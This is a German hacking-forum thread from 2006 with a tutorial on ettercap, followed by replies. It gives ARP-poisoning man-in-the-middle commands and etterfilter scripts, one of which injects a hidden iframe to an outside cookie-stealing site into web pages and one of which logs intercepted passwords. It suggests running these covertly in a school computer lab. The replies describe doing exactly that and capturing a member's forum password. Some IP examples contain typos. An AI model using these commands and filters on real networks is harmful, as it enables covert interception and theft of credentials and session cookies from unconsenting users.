Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=80e87cc4e73d5ae0d9bc6032da90882e profile.php?mode=register&sid=80e87cc4e73d5ae0d9bc6032da90882e faq.php?sid=80e87cc4e73d5ae0d9bc6032da90882e memberlist.php?sid=80e87cc4e73d5ae0d9bc6032da90882e search.php?sid=80e87cc4e73d5ae0d9bc6032da90882e index.php?sid=80e87cc4e73d5ae0d9bc6032da90882e

Foren-Übersicht » Netzwerksicherheit » [tut] ettercap - Parameter und Filter
Neues Thema eröffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nächstes Thema anzeigen 
[tut] ettercap - Parameter und Filter
BeitragVerfasst am: 05.05.2006 16:49 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




Dieses Tutorial soll nur die technischen Möglichkeiten in einem Netzwerk demonstrieren und darf unter keinen Umstädnen dürchgeführt werden.
Weder der Forenbetreiber, noch der Autor übernehmen Haftung für entstandene Schäden.



Vorwort

Hi,

ich habe in der letzten Zeit ettercap für mich entdeckt, weil es ein sehr spaßiges Programm ist. Smile
Das schöne ist, dass es auch in geswitchten Netzwerken funktioniert.
Ich denke, es ist einigen schon bekannt, aber für den Rest sicherlich gut.^^
Code:
(14:30:59) -<[Phara0h]>-:  naja... ich denke mal die meisten können damit umgehen
(14:31:07) 4lx:  meinste?
(14:31:17) -<[Phara0h]>-:  wenigstens mit dem gui xD

Weil ich das gui nicht mag... mache ichs!^^

Ich habe haupsächlich ARP-Spoofing und -Poisoning verwendet, was schematisch so funktioniert:


Quelle: http://www.irongeek.com/images/mim.png



Basics

Für die Ausgabe kann man den normalen Textmodus verwenden, den ich bevorzuge. Es gibt noch zwei andere Möglichkeiten... Wink
Code:
ettercap -T  //Textmodus
ettercap -C  //NCurse gui (für die Konsole, in C)
ettercap -G  //GTK2 gui (mag ich nicht^^)


Um nur die wichtigsten Informationen herausgefiltert zu bekommen, sollte man den output auf quiet stellen, sonst bekommt man nichts mehr mit.^^
Code:
ettercap -q


Man kann ettercap auch als Daemon im Hintergrund laufen lassen, was natürlich nur Sinn macht, wenn die gewünschten Informationen geloggt werden.
Code:
ettercap -D -L /root/ec.log


Wenn man mehrere Netzwerkinterfaces zur Verfügung hat und nicht das standardmäßige auswählen möchte, dann muss man dies noch angeben.
Code:
ettercap -i eth1


Natürlich rennt ettercap auch in mit WEP verschlüsselten WLANS (den psk kann man sich ja anderweitig besorgen..):
Code:
-W 128:p:secret


Man In The Middle

Das entsprechende Parameter für ettercap ist "-M", gefolgt von der Art.
Am effizentesten arbeitet die Vergiftung mit ARP... Wink
Funktioniert leider nicht mit festen ARP-Tables.
Code:
ettercap -M arp


Wenn man sich phyikalisch zwischen zwei Rechner schaltet, also ganz klassisch, zum Beispiel Router und Desktop-PC, also gebridget, muss man mit dem Parameter "-B" noch angeben, welche Interfaces in welche Richtung senden soll.
Mit dieser Technik ist mal absolut unsichtbar und kann auch SSL-verschlüsselte Verbindungen abhören. Wie man sich ein Zertifikat einrichtet, steht in den man-Seiten.
Code:
ettercap -B eth0 eth1


Zielspezifizierung

Die Spezifikation erfolgt durch Schrägtisch mit Adressen...^^
Wenn man alle im selben Nettwerk befindlichen Hosts vergiften will, reicht es, dies so zu tun:
Code:
ettercap -M arp // //

Dann hört man garantiert alles. Wink

Um den Verkehr zwischen dem Gateway 192.168.1.254 und dem User an 192.169.1.23 an Port 80 abzuhören, sollte man folgendes benutzen:
Code:
ettercap -M arp /192.168.1.23/80 /192.1681.254/


Man kann auch mehrere Hosts und Ports auswählen:
Code:
ettercap -M arp /192.168.1.23-42/22,80 /192.1681.254/



Filter

Jetzt kommt der spaßigste Part. Wink

Am einfachsten ist es wohl ein lustigen Filter zu schreiben, der alle Bilder durch ein eigenes austauscht, zu benutzen, so wie es auf der Defcon mit airpwn gemacht wurde. Das ist aber leider wenig von praktischem Nutzen.^^
Also lieber einen Filter mit Hintergrund schreiben... Man überlege sich mal, dass man im Informatikraum in der Schule sitzt und es zu auffälig ist, ettercap laufen zu lassen. Also baut man sich ein Script, welches ettercap als Daemon ausführt und an jedes " </body>" durch ein "<iframe src="http://www.cookiekl.au/"></body>" austauscht.
Das schöne an den Filter ist, dass der Source-Code so leicht verständlich ist. Darum am besten ein Beispiel:
Code:
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<iframe src"..." heigth="0" width="0"></body>" ");
   msg("Frame placed!\n");
}


Man kann natürlich auch nach Variablen suchen, zum Beispiel passwd und diese dann loggen:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, ".passwd=")) {
      msg("Gotcha!\n");
      log(DATA.data, "/root/log.txt");
   }
}


Ich hoffe die Filter sind selbsterklärend genung.

Die Filter müssen kompiliert werden, und zwar mit etterfilter.
Wenn man kein Parameter für den Output angibt, wird der Filter als filter.ef gespeichert. Anderenfalls gehts so:
Code:
etterfilter myfilter.txt -o myfilter.ef


Das Parameter zu einsetzen ist "-F".
Code:
ettercap -F myfilter.ef



Beispiele

Jetzt lieber nochmal gezeigt, wie man alles anwendet. Wink
Code:
ettercap -Tq -i eth1 -M arp // //
ettercap -Tq -F myfilter.ef //192.168.1.23/80 //80
ettercap -C -M arp:remote // //
ettercap -Tq -W 128:p:secret -M port // //
ettercap -D -L /root/pinguin.txt -B eth0 eth1 // //


Hinweis: Zum Testen braucht man natürlich zwei Rechner. Wink

Nachwort

Ich hoffe, ihr habt Spaß mit ettercap (aber nicht in meinem Netzwerk), vorallem die, die ettercap noch nicht kannten/benutzen konnten.

Bitte schreibt eure Meinungen und Verbesserungen!
thx (vorallem an phara0h, den Meister der Rechtschreibung^^)

4lx


Zuletzt bearbeitet von 4lx am 06.05.2006 09:05, insgesamt 2-mal bearbeitet

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 05.05.2006 19:47 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Das mit den Bildern und dem Inf-Raum war schon funny, wa?
Vor allem als dann noch irgendwer im Netzwerk aktiv im Internet gesurfed hat...
Der muss blöd geguckt haben xD

Naja... Abgesehen davon, dass da 2 - 3 kleine Rechtschreibfehler drinn waren ein gutes Tut für alle, die zu fauk sind die man zu lesen Razz


Zuletzt bearbeitet von Phara0h am 05.05.2006 20:04, insgesamt einmal bearbeitet

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 05.05.2006 19:51 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Hi,

ich werde mir das mal angucken wenn ich wieder was mehr Zeit habe; habs jetzt nur überflogen aber mir gefällts - also ein gutes Tut.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 06.05.2006 09:39 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




@Phara0h:
Jopp, das im Informatikraum war lustig... Hat noch besser geklappt als bei mir zu Hause.
Könnte am Switch liegen!?

@Cerox:
Dein Forum ist besonders gefähret. Wink
Während bei GMX oder Web.de das Passwort nicht ausgegeben wurde, stand es nach einem Loginversuch hier schon in Plaintext da. Razz

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 06.05.2006 18:42 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Naja... eigentlich ist alles gefährdet, das nicht SSL-verschlüsselt ist...
Und wenn man als mitm-Methode dchp benutzt im bridged sniffing mode ist selbst SSL nicht mehr sicher...

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 07.05.2006 00:16 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Naja das Forum ist nicht gefährdet. Der Account eines Users ist gefährdet und das sind einige Accounts sowieso durch Passwörter, die dem Vornamen gleichen oder solche Späße. Und wen interessiert das? Keinen, denn es kann sich sowieso jeder registrieren und mein Passwort bekommt so leicht keiner^^

Ich habe mir ettercap jetzt mal angeschaut.

Mit "ettercap -T -M arp // //" funktioniert das ganze wunderbar - d.h. die ARP-Tabellen meiner zwei anderen Hosts im LAN werden vergiftet und ich sehe alles auf dem Terminal.

Nun das Phänomen, welches ich mir noch nicht so ganz erklären kann:

ettercap -T -M arp /192.168.5.3/ /192.168.5.1/

Mit dieser Einstellung sehe ich nur lokalen Datenverkehr, d.h. Datenverkehr von 192.168.5.1 zu 192.168.5.3 und andersrum. Ich sehe jedoch keinerlei Traffic in das Internet oder vom Internet. Die ARP-Tabellen sind so wie sie sein sollen, d.h. manipuliert, sonst könnte ich ja auch den LAN-Traffic nicht sniffen.

Weiß jemand woran das liegt?
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 07.05.2006 09:26 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beiträge: 369
Wohnort: /offtopic




Ich habe irgendwie die Vermutung, dass der Fehler in meinem Tut liegt...

Probier mal bitte /192.168.5.1,3/ //. Wink

Ich konnte es selber noch nicht testen, weil ich keine Zeit habe.^^ Nachher...

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstörung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhäusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 07.05.2006 11:25 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Wenn man das macht, scannt er das ganze Netz wieder und vergiftet alle Hosts.

edit:
So funktioniert es:
ettercap -T -M arp /192.168.5.1,3/

Was mir jedoch aufällt egal ob man zwischen zwei Hosts geht oder alles snifft... wieso snifft der keine Pings bzw. anscheinend generell kein ICMP?
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
[tut] ettercap - Parameter und Filter
Foren-Übersicht » Netzwerksicherheit
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema eröffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche Übersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum